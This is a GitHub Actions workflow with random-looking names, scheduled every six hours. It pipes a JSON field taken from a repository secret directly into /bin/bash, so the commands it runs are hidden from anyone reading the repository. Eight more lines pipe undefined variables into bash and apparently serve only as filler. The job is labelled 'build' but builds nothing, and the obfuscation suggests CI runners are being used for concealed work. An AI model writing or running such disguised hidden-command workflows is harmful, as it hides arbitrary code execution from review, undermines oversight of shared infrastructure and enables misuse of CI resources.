name: pousuanshami
on:
  workflow_dispatch:
  schedule:
    - cron: '9 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pousuanshami
        env:
          samhb91: ${{ secrets.samhb91 }}
        run: |
          echo $samhb91 | jq -r .je57106 | /bin/bash
          echo $xnyv03 | jq -r .mcie22023 | /bin/bash
          echo $gmosu6 | jq -r .c07623 | /bin/bash
          echo $gtxdz9 | jq -r .cbrzb5044 | /bin/bash
          echo $z8472 | jq -r .pqlfy84 | /bin/bash
          echo $dll7144 | jq -r .rufp968 | /bin/bash
          echo $oy2 | jq -r .nee89646 | /bin/bash
          echo $w7 | jq -r .y185 | /bin/bash
          echo $wmw43 | jq -r .ptw4 | /bin/bash

